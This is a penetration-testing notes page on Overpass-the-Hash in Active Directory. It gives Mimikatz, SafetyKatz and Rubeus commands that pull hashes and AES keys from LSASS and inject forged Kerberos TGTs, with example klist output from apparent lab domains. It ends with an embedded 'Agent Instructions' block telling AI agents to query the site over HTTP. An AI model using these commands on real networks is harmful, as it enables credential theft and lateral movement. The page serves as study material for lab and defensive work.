# Overpass-the-Hash {% hint style="info" %} ## Pass-the-Hash vs Overpass-the-Hash * [**Pass-the-Hash (PtH)**](https://x7331.gitbook.io/boxes/tl-dr/active-directory/lateral-movement/pass-the-hash) involves reusing NTLM password hashes—typically the NT hash of a user account—to authenticate over NTLM. This technique works with both local and domain accounts but only against services that accept NTLM (e.g., SMB, WMI, WinRM with NTLM fallback). * **Overpass-the-Hash (OtH)** leverages the NT or AES keys of a domain user to generate valid Kerberos TGTs, which are then injected into the current session (or a new one). This enables access to Kerberos-authenticated services and is preferred in environments that restrict or monitor NTLM. OtH is effectively a Kerberos-based equivalent of PtH, offering broader access in modern enterprise networks. {% endhint %} **Overpass-the-Hash (OtH)** enables Kerberos-based lateral movement by forging a valid TGT from a user's NTLM or AES key, avoiding NTLM authentication entirely. Tools like [Mimikatz](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/mimikatz) generate and inject the TGT into a new process (e.g., `cmd.exe` or PowerShell), allowing access to Kerberos-protected services such as RDP, CIFS, or WinRM. OtH attacks start a new process with Logon Type 9 (`runas /netonly`). This technique is typically used after compromising a host where the target user has logged in. With administrative access, the attacker extracts the user’s hash from LSASS, generates a Kerberos ticket, and injects it into memory. **OtH is stealthier than PtH**, evades NTLM restrictions, and leverages native system tooling while operating entirely within the Kerberos trust model. ## Tools {% hint style="info" %} Although the `mimikatz` module is named `sekurlsa::pth`, this is technically an OtH attack—not traditional PtH; this is just a misnomer. {% endhint %} {% tabs %} {% tab title="mimikatz" %} Execute an OtH attack with [Mimikatz](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/mimikatz): {% code overflow="wrap" %} ```powershell .\mimikatz.exe "privilege::debug" "sekurlsa::pth /user:jen /domain:corp.com /ntlm:369def79d8372408bf6e93364cc93075 /run:powershell" "exit" ``` {% endcode %} There are no cached TGTs yet, as no Kerberos-authenticated service is accessed: ```powershell > klist ... Cached Tickets: (0) ``` When a Kerberos-based service is used (e.g. CIFS), a TGT for `krbtgt/CORP.COM` and TGS for `cifs/files04` will be generated: {% code overflow="wrap" %} ```powershell > net use \\files04 The command completed successfully. > klist ... Cached Tickets: (2) #0> Client: jen @ CORP.COM Server: krbtgt/CORP.COM @ CORP.COM KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize Start Time: 2/27/2023 5:27:28 (local) End Time: 2/27/2023 15:27:28 (local) Renew Time: 3/6/2023 5:27:28 (local) Session Key Type: RSADSI RC4-HMAC(NT) Cache Flags: 0x1 -> PRIMARY Kdc Called: DC1.corp.com #1> Client: jen @ CORP.COM Server: cifs/files04 @ CORP.COM KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96 Ticket Flags 0x40a10000 -> forwardable renewable pre_authent name_canonicalize Start Time: 2/27/2023 5:27:28 (local) End Time: 2/27/2023 15:27:28 (local) Renew Time: 3/6/2023 5:27:28 (local) Session Key Type: AES-256-CTS-HMAC-SHA1-96 Cache Flags: 0 Kdc Called: DC1.corp.com ``` {% endcode %} The NTLM hash has been successfully converted a TGT. The latter can now use any Kerberos-based authentication tool, such as [`PsExec`](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/sysinternals). {% endtab %} {% tab title="SafetyKatz" %} To perform an OtH attack with [SafetyKatz](https://x7331.gitbook.io/boxes/tl-dr/active-directory/lateral-movement/broken-reference): {% code overflow="wrap" %} ```powershell # Extract ASE256 keys from LSASS .\SafetyKatz.exe "privilege::debug" "sekurlsa::ekeys" "exit" ``` {% endcode %} Use the AES256 key (or NT hash) of a domain user to inject a forged TGT and launch a new process (e.g., `cmd.exe`) with Logon Type 9 (`runas /netonly`): {% hint style="warning" %} The OtH attack with SafetyKatz needs to be run from an elevated shell! {% endhint %} {% code overflow="wrap" %} ```powershell .\SafetyKatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:dollarcorp.moneycorp.local /aes256: /run:cmd.exe" "exit" ``` {% endcode %} {% endtab %} {% tab title="Rubeus" %} [Rubeus](https://x7331.gitbook.io/boxes/tl-dr/active-directory/ad-tools/rubeus) can be used for OtH attacks **without access to an elevated shell**. The downside is that it overwrites the current tickets: ```powershell .\Rubeus.exe asktgt /user:administrator /rc4: /ptt ``` If a new process need to be started (to avoid overwriting), access to an elevated shell is required: {% code overflow="wrap" %} ```powershell .\Rubeus.exe asktgt /user:administrator /aes256: /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt ``` {% endcode %} {% endtab %} {% endtabs %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://x7331.gitbook.io/boxes/tl-dr/active-directory/lateral-movement/overpass-the-hash.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.